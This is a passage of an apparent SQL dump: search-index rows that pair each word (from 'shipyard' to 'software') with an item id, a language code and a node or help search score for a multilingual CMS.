('shipyard', 24, 'en', 'node_search', 1),
('shipyard', 31, 'en', 'node_search', 2.90286),
('shipyards', 10, 'en', 'node_search', 28),
('shipyards', 10, 'ko', 'node_search', 28),
('shipyards', 23, 'en', 'node_search', 0.923838),
('shipyards', 24, 'en', 'node_search', 1),
('shipyards', 31, 'en', 'node_search', 28),
('shop', 24, 'en', 'node_search', 0.938382),
('shopping', 162, 'en', 'node_search', 1),
('short', 71, 'en', 'help_search', 1),
('short', 71, 'ja', 'help_search', 1),
('short', 71, 'ko', 'help_search', 1),
('short', 86, 'en', 'help_search', 1),
('short', 86, 'ja', 'help_search', 1),
('short', 86, 'ko', 'help_search', 1),
('short', 87, 'en', 'help_search', 1),
('short', 87, 'ja', 'help_search', 1),
('short', 87, 'ko', 'help_search', 1),
('shortcut', 69, 'en', 'help_search', 54.9341),
('shortcut', 69, 'ja', 'help_search', 54.9341),
('shortcut', 69, 'ko', 'help_search', 54.9341),
('shortcuts', 43, 'en', 'help_search', 1),
('shortcuts', 43, 'ja', 'help_search', 1),
('shortcuts', 43, 'ko', 'help_search', 1),
('shortcuts', 69, 'en', 'help_search', 47.937),
('shortcuts', 69, 'ja', 'help_search', 47.937),
('shortcuts', 69, 'ko', 'help_search', 47.937),
('should', 1, 'en', 'help_search', 1),
('should', 1, 'ja', 'help_search', 1),
('should', 1, 'ko', 'help_search', 1),
('should', 3, 'en', 'node_search', 44),
('should', 3, 'ko', 'node_search', 44),
('should', 6, 'en', 'help_search', 3),
('should', 6, 'ja', 'help_search', 3),
('should', 6, 'ko', 'help_search', 3),
('should', 19, 'en', 'help_search', 1),
('should', 19, 'ja', 'help_search', 1),
('should', 19, 'ko', 'help_search', 1),
('should', 22, 'en', 'help_search', 0.961087),
('should', 22, 'ja', 'help_search', 0.961087),
('should', 22, 'ko', 'help_search', 0.961087),
('should', 24, 'en', 'help_search', 2),
('should', 24, 'ja', 'help_search', 2),
('should', 24, 'ko', 'help_search', 2),
('should', 27, 'en', 'help_search', 2),
('should', 27, 'ja', 'help_search', 2),
('should', 27, 'ko', 'help_search', 2),
('should', 28, 'en', 'help_search', 1.69324),
('should', 28, 'ja', 'help_search', 1.69324),
('should', 28, 'ko', 'help_search', 1.69324),
('should', 29, 'en', 'help_search', 1),
('should', 29, 'ja', 'help_search', 1),
('should', 29, 'ko', 'help_search', 1),
('should', 32, 'en', 'help_search', 2),
('should', 32, 'ja', 'help_search', 2),
('should', 32, 'ko', 'help_search', 2),
('should', 39, 'en', 'help_search', 2),
('should', 39, 'ja', 'help_search', 2),
('should', 39, 'ko', 'help_search', 2),
('should', 45, 'en', 'help_search', 1),
('should', 45, 'ja', 'help_search', 1),
('should', 45, 'ko', 'help_search', 1),
('should', 49, 'en', 'help_search', 1),
('should', 49, 'ja', 'help_search', 1),
('should', 49, 'ko', 'help_search', 1),
('should', 50, 'en', 'help_search', 1),
('should', 50, 'ja', 'help_search', 1),
('should', 50, 'ko', 'help_search', 1),
('should', 56, 'en', 'help_search', 1),
('should', 56, 'ja', 'help_search', 1),
('should', 56, 'ko', 'help_search', 1),
('should', 67, 'en', 'help_search', 0.957226),
('should', 67, 'ja', 'help_search', 0.957226),
('should', 67, 'ko', 'help_search', 0.957226),
('should', 71, 'en', 'help_search', 3),
('should', 71, 'ja', 'help_search', 3),
('should', 71, 'ko', 'help_search', 3),
('should', 72, 'en', 'help_search', 1.86054),
('should', 72, 'ja', 'help_search', 1.86054),
('should', 72, 'ko', 'help_search', 1.86054),
('should', 74, 'en', 'help_search', 1),
('should', 74, 'ja', 'help_search', 1),
('should', 74, 'ko', 'help_search', 1),
('should', 75, 'en', 'help_search', 2),
('should', 75, 'ja', 'help_search', 2),
('should', 75, 'ko', 'help_search', 2),
('should', 76, 'en', 'help_search', 1),
('should', 76, 'ja', 'help_search', 1),
('should', 76, 'ko', 'help_search', 1),
('should', 77, 'en', 'help_search', 2),
('should', 77, 'ja', 'help_search', 2),
('should', 77, 'ko', 'help_search', 2),
('should', 81, 'en', 'help_search', 1),
('should', 81, 'ja', 'help_search', 1),
('should', 81, 'ko', 'help_search', 1),
('should', 83, 'en', 'help_search', 2),
('should', 83, 'ja', 'help_search', 2),
('should', 83, 'ko', 'help_search', 2),
('should', 85, 'en', 'help_search', 2),
('should', 85, 'ja', 'help_search', 2),
('should', 85, 'ko', 'help_search', 2),
('should', 86, 'en', 'help_search', 0.96498),
('should', 86, 'ja', 'help_search', 0.96498),
('should', 86, 'ko', 'help_search', 0.96498),
('should', 87, 'en', 'help_search', 1),
('should', 87, 'ja', 'help_search', 1),
('should', 87, 'ko', 'help_search', 1),
('should', 92, 'en', 'help_search', 3),
('should', 92, 'ja', 'help_search', 3),
('should', 92, 'ko', 'help_search', 3),
('show', 7, 'en', 'help_search', 4),
('show', 7, 'ja', 'help_search', 4),
('show', 7, 'ko', 'help_search', 4),
('show', 23, 'en', 'help_search', 1),
('show', 23, 'ja', 'help_search', 1),
('show', 23, 'ko', 'help_search', 1),
('show', 40, 'en', 'help_search', 1),
('show', 40, 'ja', 'help_search', 1),
('show', 40, 'ko', 'help_search', 1),
('show', 42, 'en', 'help_search', 4),
('show', 42, 'ja', 'help_search', 4),
('show', 42, 'ko', 'help_search', 4),
('show', 56, 'en', 'help_search', 5),
('show', 56, 'ja', 'help_search', 5),
('show', 56, 'ko', 'help_search', 5),
('show', 59, 'en', 'help_search', 1),
('show', 59, 'ja', 'help_search', 1),
('show', 59, 'ko', 'help_search', 1),
('show', 87, 'en', 'node_search', 1),
('show', 90, 'en', 'help_search', 4),
('show', 90, 'ja', 'help_search', 4),
('show', 90, 'ko', 'help_search', 4),
('show', 92, 'en', 'help_search', 4),
('show', 92, 'ja', 'help_search', 4),
('show', 92, 'ko', 'help_search', 4),
('showing', 93, 'en', 'help_search', 1),
('showing', 93, 'ja', 'help_search', 1),
('showing', 93, 'ko', 'help_search', 1),
('shown', 2, 'en', 'help_search', 2),
('shown', 2, 'ja', 'help_search', 2),
('shown', 2, 'ko', 'help_search', 2),
('shown', 4, 'en', 'help_search', 1),
('shown', 4, 'ja', 'help_search', 1),
('shown', 4, 'ko', 'help_search', 1),
('shown', 5, 'en', 'help_search', 1),
('shown', 5, 'ja', 'help_search', 1),
('shown', 5, 'ko', 'help_search', 1),
('shown', 10, 'en', 'help_search', 2),
('shown', 10, 'ja', 'help_search', 2),
('shown', 10, 'ko', 'help_search', 2),
('shown', 20, 'en', 'help_search', 1),
('shown', 20, 'ja', 'help_search', 1),
('shown', 20, 'ko', 'help_search', 1),
('shown', 23, 'en', 'help_search', 1.92384),
('shown', 23, 'ja', 'help_search', 1.92384),
('shown', 23, 'ko', 'help_search', 1.92384),
('shown', 27, 'en', 'help_search', 1),
('shown', 27, 'ja', 'help_search', 1),
('shown', 27, 'ko', 'help_search', 1),
('shown', 28, 'en', 'help_search', 1),
('shown', 28, 'ja', 'help_search', 1),
('shown', 28, 'ko', 'help_search', 1),
('shown', 46, 'en', 'help_search', 0.98493),
('shown', 46, 'ja', 'help_search', 0.98493),
('shown', 46, 'ko', 'help_search', 0.98493),
('shown', 55, 'en', 'help_search', 1),
('shown', 55, 'ja', 'help_search', 1),
('shown', 55, 'ko', 'help_search', 1),
('shown', 56, 'en', 'help_search', 1),
('shown', 56, 'ja', 'help_search', 1),
('shown', 56, 'ko', 'help_search', 1),
('shown', 59, 'en', 'help_search', 2),
('shown', 59, 'ja', 'help_search', 2),
('shown', 59, 'ko', 'help_search', 2),
('shown', 61, 'en', 'help_search', 1),
('shown', 61, 'ja', 'help_search', 1),
('shown', 61, 'ko', 'help_search', 1),
('shown', 67, 'en', 'help_search', 0.876337),
('shown', 67, 'ja', 'help_search', 0.876337),
('shown', 67, 'ko', 'help_search', 0.876337),
('shown', 79, 'en', 'help_search', 1),
('shown', 79, 'ja', 'help_search', 1),
('shown', 79, 'ko', 'help_search', 1),
('shown', 87, 'en', 'help_search', 1),
('shown', 87, 'ja', 'help_search', 1),
('shown', 87, 'ko', 'help_search', 1),
('shown', 88, 'en', 'help_search', 1),
('shown', 88, 'ja', 'help_search', 1),
('shown', 88, 'ko', 'help_search', 1),
('shown', 89, 'en', 'help_search', 1),
('shown', 89, 'ja', 'help_search', 1),
('shown', 89, 'ko', 'help_search', 1),
('shown', 91, 'en', 'help_search', 1),
('shown', 91, 'ja', 'help_search', 1),
('shown', 91, 'ko', 'help_search', 1),
('shown', 135, 'en', 'node_search', 1),
('shows', 23, 'en', 'help_search', 1),
('shows', 23, 'ja', 'help_search', 1),
('shows', 23, 'ko', 'help_search', 1),
('shows', 27, 'en', 'help_search', 1),
('shows', 27, 'ja', 'help_search', 1),
('shows', 27, 'ko', 'help_search', 1),
('shows', 91, 'en', 'help_search', 1),
('shows', 91, 'ja', 'help_search', 1),
('shows', 91, 'ko', 'help_search', 1),
('shwe', 23, 'en', 'node_search', 1),
('shwe', 27, 'en', 'node_search', 5.43048),
('shwe', 77, 'en', 'node_search', 5),
('shwe', 77, 'ja', 'node_search', 5),
('shwe', 91, 'en', 'node_search', 2),
('shwe', 91, 'ja', 'node_search', 2),
('shwe', 94, 'en', 'node_search', 2),
('shwe', 96, 'en', 'node_search', 2),
('shwe', 96, 'ja', 'node_search', 2),
('shwe', 132, 'en', 'node_search', 28),
('shwe', 132, 'ja', 'node_search', 31),
('shwe', 134, 'en', 'node_search', 1),
('shwe', 134, 'ja', 'node_search', 1),
('shwe', 157, 'en', 'node_search', 1),
('shwe', 157, 'ja', 'node_search', 1),
('shwe', 165, 'en', 'node_search', 1),
('shwe', 165, 'ja', 'node_search', 1),
('shwe', 174, 'en', 'node_search', 2),
('shwe', 174, 'ja', 'node_search', 1.72283),
('shwepyi', 27, 'en', 'node_search', 0.657549),
('side', 10, 'en', 'help_search', 4),
('side', 10, 'ja', 'help_search', 4),
('side', 10, 'ko', 'help_search', 4),
('side', 29, 'en', 'node_search', 28),
('side', 43, 'en', 'help_search', 2),
('side', 43, 'ja', 'help_search', 2),
('side', 43, 'ko', 'help_search', 2),
('significance', 122, 'en', 'node_search', 1),
('significant', 171, 'en', 'node_search', 1),
('significant', 181, 'en', 'node_search', 1),
('significant', 198, 'en', 'node_search', 27),
('similar', 30, 'en', 'help_search', 1),
('similar', 30, 'ja', 'help_search', 1),
('similar', 30, 'ko', 'help_search', 1),
('similar', 61, 'en', 'help_search', 0.972861),
('similar', 61, 'ja', 'help_search', 0.972861),
('similar', 61, 'ko', 'help_search', 0.972861),
('similar', 63, 'en', 'help_search', 1),
('similar', 63, 'ja', 'help_search', 1),
('similar', 63, 'ko', 'help_search', 1),
('similar', 88, 'en', 'help_search', 2),
('similar', 88, 'ja', 'help_search', 2),
('similar', 88, 'ko', 'help_search', 2),
('simple', 16, 'en', 'help_search', 2),
('simple', 16, 'ja', 'help_search', 2),
('simple', 16, 'ko', 'help_search', 2),
('simple', 30, 'en', 'help_search', 4),
('simple', 30, 'ja', 'help_search', 4),
('simple', 30, 'ko', 'help_search', 4),
('simple', 67, 'en', 'help_search', 3.98922),
('simple', 67, 'ja', 'help_search', 3.98922),
('simple', 67, 'ko', 'help_search', 3.98922),
('simple', 73, 'en', 'help_search', 1),
('simple', 73, 'ja', 'help_search', 1),
('simple', 73, 'ko', 'help_search', 1),
('sin', 165, 'en', 'node_search', 1),
('sin', 165, 'ja', 'node_search', 1),
('since', 23, 'en', 'node_search', 1),
('since', 47, 'en', 'help_search', 1),
('since', 47, 'ja', 'help_search', 1),
('since', 47, 'ko', 'help_search', 1),
('sincere', 133, 'en', 'node_search', 1),
('sincere', 165, 'en', 'node_search', 1),
('sincere', 168, 'en', 'node_search', 1),
('sincere', 177, 'en', 'node_search', 1),
('sincere', 193, 'en', 'node_search', 1),
('sincere', 195, 'en', 'node_search', 1),
('sincerely', 154, 'en', 'node_search', 1),
('sincerely', 161, 'en', 'node_search', 1),
('sincerely', 174, 'en', 'node_search', 1),
('sincerely', 179, 'en', 'node_search', 1),
('sincerely', 180, 'en', 'node_search', 1),
('sincerely', 181, 'en', 'node_search', 1),
('sincerely', 185, 'en', 'node_search', 1),
('sincerely', 187, 'en', 'node_search', 1),
('sincerely', 188, 'en', 'node_search', 1),
('sincerely', 190, 'en', 'node_search', 1),
('sincerely', 192, 'en', 'node_search', 1),
('sincerely', 196, 'en', 'node_search', 1),
('singapore', 5, 'en', 'node_search', 4),
('singapore', 5, 'ko', 'node_search', 4),
('singapore', 23, 'en', 'node_search', 0.886095),
('singapore', 24, 'en', 'node_search', 0.886095),
('singapore', 30, 'en', 'node_search', 28),
('single', 11, 'en', 'help_search', 1),
('single', 11, 'ja', 'help_search', 1),
('single', 11, 'ko', 'help_search', 1),
('single', 13, 'en', 'help_search', 31),
('single', 13, 'ja', 'help_search', 31),
('single', 13, 'ko', 'help_search', 31),
('single', 15, 'en', 'help_search', 32),
('single', 15, 'ja', 'help_search', 32),
('single', 15, 'ko', 'help_search', 32),
('single', 93, 'en', 'help_search', 1),
('single', 93, 'ja', 'help_search', 1),
('single', 93, 'ko', 'help_search', 1),
('singleitem', 30, 'en', 'help_search', 0.805455),
('singleitem', 30, 'ja', 'help_search', 0.805455),
('singleitem', 30, 'ko', 'help_search', 0.805455),
('singlevalued', 31, 'ja', 'help_search', 1.60675),
('sinmalai', 17, 'en', 'node_search', 29),
('sinmalike', 4, 'en', 'node_search', 1),
('sinmalike', 4, 'ja', 'node_search', 1),
('sinmalike', 9, 'en', 'node_search', 28),
('sinmalike', 23, 'en', 'node_search', 0.96498),
('sinmalike', 23, 'ko', 'node_search', 0.899454),
('sinmalike', 24, 'en', 'node_search', 1),
('sinmalike', 24, 'ko', 'node_search', 1),
('sinmalike', 31, 'en', 'node_search', 2),
('site', 1, 'en', 'help_search', 1),
('site', 1, 'ja', 'help_search', 1),
('site', 1, 'ko', 'help_search', 1),
('site', 2, 'en', 'help_search', 3),
('site', 2, 'ja', 'help_search', 3),
('site', 2, 'ko', 'help_search', 3),
('site', 4, 'en', 'help_search', 2),
('site', 4, 'ja', 'help_search', 2),
('site', 4, 'ko', 'help_search', 2),
('site', 6, 'en', 'help_search', 1),
('site', 6, 'ja', 'help_search', 1),
('site', 6, 'ko', 'help_search', 1),
('site', 11, 'en', 'help_search', 2.91323),
('site', 11, 'ja', 'help_search', 2.91323),
('site', 11, 'ko', 'help_search', 2.91323),
('site', 12, 'en', 'help_search', 27),
('site', 12, 'ja', 'help_search', 27),
('site', 12, 'ko', 'help_search', 27),
('site', 14, 'en', 'help_search', 28),
('site', 14, 'ja', 'help_search', 28),
('site', 14, 'ko', 'help_search', 28),
('site', 16, 'en', 'help_search', 1),
('site', 16, 'ja', 'help_search', 1),
('site', 16, 'ko', 'help_search', 1),
('site', 18, 'en', 'help_search', 1),
('site', 18, 'ja', 'help_search', 1),
('site', 18, 'ko', 'help_search', 1),
('site', 20, 'en', 'help_search', 5),
('site', 20, 'ja', 'help_search', 5),
('site', 20, 'ko', 'help_search', 5),
('site', 22, 'en', 'help_search', 2),
('site', 22, 'ja', 'help_search', 2),
('site', 22, 'ko', 'help_search', 2),
('site', 23, 'en', 'help_search', 3),
('site', 23, 'ja', 'help_search', 3),
('site', 23, 'ko', 'help_search', 3),
('site', 28, 'en', 'help_search', 6.99315),
('site', 28, 'ja', 'help_search', 6.99315),
('site', 28, 'ko', 'help_search', 6.99315),
('site', 29, 'en', 'help_search', 61.1676),
('site', 29, 'ja', 'help_search', 61.1676),
('site', 29, 'ko', 'help_search', 61.1676),
('site', 30, 'en', 'help_search', 32.2666),
('site', 30, 'ja', 'help_search', 32.2666),
('site', 30, 'ko', 'help_search', 32.2666),
('site', 31, 'ja', 'help_search', 30.9082),
('site', 32, 'en', 'help_search', 9),
('site', 32, 'ja', 'help_search', 9),
('site', 32, 'ko', 'help_search', 9),
('site', 33, 'en', 'help_search', 40),
('site', 33, 'ja', 'help_search', 40),
('site', 33, 'ko', 'help_search', 40),
('site', 34, 'en', 'help_search', 33),
('site', 34, 'ja', 'help_search', 33),
('site', 34, 'ko', 'help_search', 33),
('site', 35, 'en', 'help_search', 1),
('site', 35, 'ja', 'help_search', 1),
('site', 35, 'ko', 'help_search', 1),
('site', 36, 'en', 'help_search', 2),
('site', 36, 'ja', 'help_search', 2),
('site', 36, 'ko', 'help_search', 2),
('site', 37, 'en', 'help_search', 66.989),
('site', 37, 'ja', 'help_search', 66.989),
('site', 37, 'ko', 'help_search', 66.989),
('site', 38, 'en', 'help_search', 29),
('site', 38, 'ja', 'help_search', 29),
('site', 38, 'ko', 'help_search', 29),
('site', 39, 'en', 'help_search', 1),
('site', 39, 'ja', 'help_search', 1),
('site', 39, 'ko', 'help_search', 1),
('site', 40, 'en', 'help_search', 1),
('site', 40, 'ja', 'help_search', 1),
('site', 40, 'ko', 'help_search', 1),
('site', 41, 'en', 'help_search', 21),
('site', 41, 'ja', 'help_search', 21),
('site', 41, 'ko', 'help_search', 21),
('site', 43, 'en', 'help_search', 4.71269),
('site', 43, 'ja', 'help_search', 4.71269),
('site', 43, 'ko', 'help_search', 4.71269),
('site', 44, 'en', 'help_search', 2),
('site', 44, 'ja', 'help_search', 2),
('site', 44, 'ko', 'help_search', 2),
('site', 45, 'en', 'help_search', 2),
('site', 45, 'ja', 'help_search', 2),
('site', 45, 'ko', 'help_search', 2),
('site', 47, 'en', 'help_search', 1),
('site', 47, 'ja', 'help_search', 1),
('site', 47, 'ko', 'help_search', 1),
('site', 49, 'en', 'help_search', 1),
('site', 49, 'ja', 'help_search', 1),
('site', 49, 'ko', 'help_search', 1),
('site', 50, 'en', 'help_search', 3),
('site', 50, 'ja', 'help_search', 3),
('site', 50, 'ko', 'help_search', 3),
('site', 52, 'en', 'help_search', 3),
('site', 52, 'ja', 'help_search', 3),
('site', 52, 'ko', 'help_search', 3),
('site', 54, 'en', 'help_search', 1),
('site', 54, 'ja', 'help_search', 1),
('site', 54, 'ko', 'help_search', 1),
('site', 56, 'en', 'help_search', 1),
('site', 56, 'ja', 'help_search', 1),
('site', 56, 'ko', 'help_search', 1),
('site', 57, 'en', 'help_search', 1),
('site', 57, 'ja', 'help_search', 1),
('site', 57, 'ko', 'help_search', 1),
('site', 59, 'en', 'help_search', 2),
('site', 59, 'ja', 'help_search', 2),
('site', 59, 'ko', 'help_search', 2),
('site', 62, 'en', 'help_search', 1),
('site', 62, 'ja', 'help_search', 1),
('site', 62, 'ko', 'help_search', 1),
('site', 64, 'en', 'help_search', 2),
('site', 64, 'ja', 'help_search', 2),
('site', 64, 'ko', 'help_search', 2),
('site', 65, 'en', 'help_search', 2),
('site', 65, 'ja', 'help_search', 2),
('site', 65, 'ko', 'help_search', 2),
('site', 66, 'en', 'help_search', 2),
('site', 66, 'ja', 'help_search', 2),
('site', 67, 'en', 'help_search', 6.76836),
('site', 67, 'ja', 'help_search', 6.76836),
('site', 67, 'ko', 'help_search', 6.76836),
('site', 68, 'en', 'help_search', 69.9142),
('site', 68, 'ja', 'help_search', 69.9142),
('site', 68, 'ko', 'help_search', 69.9142),
('site', 69, 'en', 'help_search', 1),
('site', 69, 'ja', 'help_search', 1),
('site', 69, 'ko', 'help_search', 1),
('site', 70, 'en', 'help_search', 31),
('site', 70, 'ja', 'help_search', 31),
('site', 70, 'ko', 'help_search', 31),
('site', 71, 'en', 'help_search', 36),
('site', 71, 'ja', 'help_search', 36),
('site', 71, 'ko', 'help_search', 36),
('site', 72, 'en', 'help_search', 12.7251),
('site', 72, 'ja', 'help_search', 12.7251),
('site', 72, 'ko', 'help_search', 12.7251),
('site', 73, 'en', 'help_search', 21),
('site', 73, 'ja', 'help_search', 21),
('site', 73, 'ko', 'help_search', 21),
('site', 75, 'en', 'help_search', 1),
('site', 75, 'ja', 'help_search', 1),
('site', 75, 'ko', 'help_search', 1),
('site', 76, 'en', 'help_search', 32),
('site', 76, 'ja', 'help_search', 32),
('site', 76, 'ko', 'help_search', 32),
('site', 77, 'en', 'help_search', 6),
('site', 77, 'ja', 'help_search', 6),
('site', 77, 'ko', 'help_search', 6),
('site', 78, 'en', 'help_search', 2),
('site', 78, 'ja', 'help_search', 2),
('site', 78, 'ko', 'help_search', 2),
('site', 80, 'en', 'help_search', 0.993146),
('site', 80, 'ja', 'help_search', 0.993146),
('site', 80, 'ko', 'help_search', 0.993146),
('site', 84, 'en', 'help_search', 31),
('site', 84, 'ja', 'help_search', 31),
('site', 84, 'ko', 'help_search', 31),
('site', 86, 'en', 'help_search', 5.99731),
('site', 86, 'ja', 'help_search', 5.99731),
('site', 86, 'ko', 'help_search', 5.99731),
('site', 90, 'en', 'help_search', 1),
('site', 90, 'ja', 'help_search', 1),
('site', 90, 'ko', 'help_search', 1),
('site', 92, 'en', 'help_search', 2),
('site', 92, 'ja', 'help_search', 2),
('site', 92, 'ko', 'help_search', 2),
('site', 93, 'en', 'help_search', 1),
('site', 93, 'ja', 'help_search', 1),
('site', 93, 'ko', 'help_search', 1),
('sites', 5, 'en', 'node_search', 3),
('sites', 5, 'ko', 'node_search', 3),
('sites', 30, 'en', 'help_search', 8.33326),
('sites', 30, 'ja', 'help_search', 8.33326),
('sites', 30, 'ko', 'help_search', 8.33326),
('sites', 33, 'en', 'help_search', 1),
('sites', 33, 'ja', 'help_search', 1),
('sites', 33, 'ko', 'help_search', 1),
('sites', 44, 'en', 'help_search', 1),
('sites', 44, 'ja', 'help_search', 1),
('sites', 44, 'ko', 'help_search', 1),
('sites', 50, 'en', 'help_search', 1),
('sites', 50, 'ja', 'help_search', 1),
('sites', 50, 'ko', 'help_search', 1),
('sites', 68, 'en', 'help_search', 1),
('sites', 68, 'ja', 'help_search', 1),
('sites', 68, 'ko', 'help_search', 1),
('sitewide', 17, 'en', 'help_search', 2),
('sitewide', 17, 'ja', 'help_search', 2),
('sitewide', 17, 'ko', 'help_search', 2),
('sitewide', 19, 'en', 'help_search', 1),
('sitewide', 19, 'ja', 'help_search', 1),
('sitewide', 19, 'ko', 'help_search', 1),
('sitewide', 20, 'en', 'help_search', 2),
('sitewide', 20, 'ja', 'help_search', 2),
('sitewide', 20, 'ko', 'help_search', 2),
('sitewide', 21, 'en', 'help_search', 2),
('sitewide', 21, 'ja', 'help_search', 2),
('sitewide', 21, 'ko', 'help_search', 2),
('situated', 4, 'en', 'node_search', 1),
('situated', 4, 'ja', 'node_search', 1),
('situations', 72, 'en', 'help_search', 1),
('situations', 72, 'ja', 'help_search', 1),
('situations', 72, 'ko', 'help_search', 1),
('size', 6, 'en', 'help_search', 2),
('size', 6, 'ja', 'help_search', 2),
('size', 6, 'ko', 'help_search', 2),
('size', 35, 'en', 'help_search', 1),
('size', 35, 'ja', 'help_search', 1),
('size', 35, 'ko', 'help_search', 1),
('sized', 35, 'en', 'help_search', 1.98087),
('sized', 35, 'ja', 'help_search', 1.98087),
('sized', 35, 'ko', 'help_search', 1.98087),
('sizes', 35, 'en', 'help_search', 1),
('sizes', 35, 'ja', 'help_search', 1),
('sizes', 35, 'ko', 'help_search', 1),
('sizing', 6, 'en', 'help_search', 0.98493),
('sizing', 6, 'ja', 'help_search', 0.98493),
('sizing', 6, 'ko', 'help_search', 0.98493),
('skill', 18, 'en', 'node_search', 1),
('skill', 18, 'ko', 'node_search', 1),
('skill', 19, 'en', 'node_search', 28),
('skill', 19, 'ko', 'node_search', 28),
('skill', 24, 'en', 'node_search', 0.784336),
('skill', 24, 'ja', 'node_search', 0.442633),
('skill', 187, 'en', 'node_search', 1),
('skilled', 23, 'en', 'node_search', 1.73474),
('skilled', 27, 'en', 'node_search', 0.953396),
('skilled', 30, 'en', 'node_search', 28),
('skilled', 154, 'en', 'node_search', 29),
('skilled', 155, 'en', 'node_search', 2),
('skilled', 156, 'en', 'node_search', 29),
('skilled', 157, 'en', 'node_search', 29),
('skilled', 160, 'en', 'node_search', 5),
('skilled', 161, 'en', 'node_search', 5),
('skilled', 162, 'en', 'node_search', 4),
('skilled', 163, 'en', 'node_search', 5),
('skilled', 164, 'en', 'node_search', 2),
('skilled', 165, 'en', 'node_search', 2),
('skilled', 166, 'en', 'node_search', 5),
('skilled', 167, 'en', 'node_search', 2),
('skilled', 168, 'en', 'node_search', 2),
('skilled', 169, 'en', 'node_search', 5),
('skilled', 170, 'en', 'node_search', 5),
('skilled', 171, 'en', 'node_search', 2),
('skilled', 173, 'en', 'node_search', 5),
('skilled', 174, 'en', 'node_search', 2),
('skilled', 175, 'en', 'node_search', 2),
('skilled', 176, 'en', 'node_search', 2),
('skilled', 177, 'en', 'node_search', 2),
('skilled', 178, 'en', 'node_search', 2),
('skilled', 179, 'en', 'node_search', 2),
('skilled', 180, 'en', 'node_search', 2),
('skilled', 184, 'en', 'node_search', 2),
('skilled', 185, 'en', 'node_search', 2),
('skilled', 186, 'en', 'node_search', 2),
('skilled', 187, 'en', 'node_search', 5),
('skilled', 188, 'en', 'node_search', 2),
('skilled', 189, 'en', 'node_search', 5),
('skilled', 190, 'en', 'node_search', 5),
('skilled', 191, 'en', 'node_search', 5),
('skilled', 192, 'en', 'node_search', 2),
('skilled', 193, 'en', 'node_search', 5),
('skilled', 194, 'en', 'node_search', 5),
('skilled', 195, 'en', 'node_search', 2),
('skilled', 196, 'en', 'node_search', 5),
('skilled', 197, 'en', 'node_search', 5),
('skilled', 198, 'en', 'node_search', 2),
('skilled', 199, 'en', 'node_search', 5),
('skills', 24, 'en', 'node_search', 0.76431),
('skills', 62, 'en', 'node_search', 1),
('skills', 66, 'en', 'node_search', 0.976851),
('skills', 116, 'en', 'node_search', 1),
('skills', 135, 'en', 'node_search', 1),
('skills', 138, 'en', 'node_search', 1),
('skills', 140, 'en', 'node_search', 1),
('skills', 169, 'en', 'node_search', 1),
('skills', 173, 'en', 'node_search', 1),
('skills', 181, 'en', 'node_search', 1),
('skills', 190, 'en', 'node_search', 1),
('skills', 193, 'en', 'node_search', 1),
('skills', 194, 'en', 'node_search', 1),
('skills', 195, 'en', 'node_search', 28),
('skills', 198, 'en', 'node_search', 1),
('sleep', 87, 'en', 'node_search', 1),
('slider1', 21, 'en', 'node_search', 27),
('slider2', 22, 'en', 'node_search', 27),
('slogan', 71, 'en', 'help_search', 2),
('slogan', 71, 'ja', 'help_search', 2),
('slogan', 71, 'ko', 'help_search', 2),
('small', 66, 'en', 'node_search', 1),
('small', 138, 'en', 'node_search', 2),
('smaller', 31, 'ja', 'help_search', 1),
('smaller', 37, 'en', 'help_search', 1),
('smaller', 37, 'ja', 'help_search', 1),
('smaller', 37, 'ko', 'help_search', 1),
('smaller', 67, 'en', 'help_search', 2),
('smaller', 67, 'ja', 'help_search', 2),
('smaller', 67, 'ko', 'help_search', 2),
('smaller', 74, 'en', 'help_search', 1),
('smaller', 74, 'ja', 'help_search', 1),
('smaller', 74, 'ko', 'help_search', 1),
('smaller', 75, 'en', 'help_search', 1),
('smaller', 75, 'ja', 'help_search', 1),
('smaller', 75, 'ko', 'help_search', 1),
('smartly', 87, 'en', 'node_search', 1),
('smooth', 27, 'en', 'node_search', 0.63333),
('social', 35, 'en', 'help_search', 1),
('social', 35, 'ja', 'help_search', 1),
('social', 35, 'ko', 'help_search', 1),
('soe', 81, 'en', 'node_search', 31),
('soe', 81, 'ja', 'node_search', 31),
('soe', 93, 'en', 'node_search', 2),
('soe', 93, 'ja', 'node_search', 2),
('soe', 102, 'en', 'node_search', 31),
('soe', 102, 'ja', 'node_search', 31),
('soe', 127, 'en', 'node_search', 28),
('soe', 127, 'ja', 'node_search', 31),
('soe', 128, 'en', 'node_search', 31),
('soe', 128, 'ja', 'node_search', 31),
('soe', 149, 'en', 'node_search', 1),
('soe', 157, 'en', 'node_search', 1),
('soe', 157, 'ja', 'node_search', 1),
('soe', 169, 'en', 'node_search', 1),
('soe', 169, 'ja', 'node_search', 1),
('soe', 173, 'en', 'node_search', 1),
('soe', 173, 'ja', 'node_search', 1),
('soe', 187, 'en', 'node_search', 6),
('soe', 187, 'ja', 'node_search', 3.96276),
('soe', 189, 'en', 'node_search', 6),
('soe', 189, 'ja', 'node_search', 3.99983),
('software', 11, 'en', 'help_search', 1),
('software', 11, 'ja', 'help_search', 1),
('software', 11, 'ko', 'help_search', 1),
('software', 23, 'en', 'help_search', 1),
('software', 23, 'ja', 'help_search', 1),
('software', 23, 'ko', 'help_search', 1),
('software', 29, 'en', 'help_search', 2),
('software', 29, 'ja', 'help_search', 2),
('software', 29, 'ko', 'help_search', 2),
('software', 30, 'en', 'help_search', 0.968904),
('software', 30, 'ja', 'help_search', 0.968904),
('software', 30, 'ko', 'help_search', 0.968904),
('software', 33, 'en', 'help_search', 1),
('software', 33, 'ja', 'help_search', 1),
('software', 33, 'ko', 'help_search', 1),
('software', 37, 'en', 'help_search', 1),
('software', 37, 'ja', 'help_search', 1),
('software', 37, 'ko', 'help_search', 1),
('software', 38, 'en', 'help_search', 4),
('software', 38, 'ja', 'help_search', 4),
('software', 38, 'ko', 'help_search', 4),
('software', 41, 'en', 'help_search', 2),
('software', 41, 'ja', 'help_search', 2),
('software', 41, 'ko', 'help_search', 2),
('software', 43, 'en', 'help_search', 1),
('software', 43, 'ja', 'help_search', 1),
('software', 43, 'ko', 'help_search', 1),
('software', 44, 'en', 'help_search', 1),
('software', 44, 'ja', 'help_search', 1),
('software', 44, 'ko', 'help_search', 1),
('software', 65, 'en', 'help_search', 1),
('software', 65, 'ja', 'help_search', 1),
('software', 65, 'ko', 'help_search', 1),
('software', 67, 'en', 'help_search', 1),
('software', 67, 'ja', 'help_search', 1),
('software', 67, 'ko', 'help_search', 1),
('software', 72, 'en', 'help_search', 2),
('software', 72, 'ja', 'help_search', 2),
('software', 72, 'ko', 'help_search', 2),
('software', 76, 'en', 'help_search', 3),
('software', 76, 'ja', 'help_search', 3),
('software', 76, 'ko', 'help_search', 3),
